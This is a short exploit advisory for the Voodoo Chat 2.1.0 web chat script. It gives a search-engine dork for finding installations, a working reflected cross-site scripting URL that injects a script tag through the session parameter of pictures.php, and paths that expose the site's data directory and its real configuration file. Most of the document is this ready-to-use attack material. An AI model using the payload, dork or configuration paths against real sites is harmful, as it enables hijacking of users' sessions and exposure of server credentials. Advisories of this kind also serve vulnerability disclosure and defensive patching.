============================================================================================================================
| # Title : Voodoo Chat 2.1.0 xss Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 Français V.(Pro) | |
| # Vendor : http://www.syria-lover.com |
| # Dork : "Powered by Voc-Ar" |
============================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
XSS:
http://127.0.0.1/groupsyria.com/chat/pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0
information disclosure :
http://127.0.0.1/groupsyria.com/data/
http://127.0.0.1/groupsyria.com/data/voc.conf = real config
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================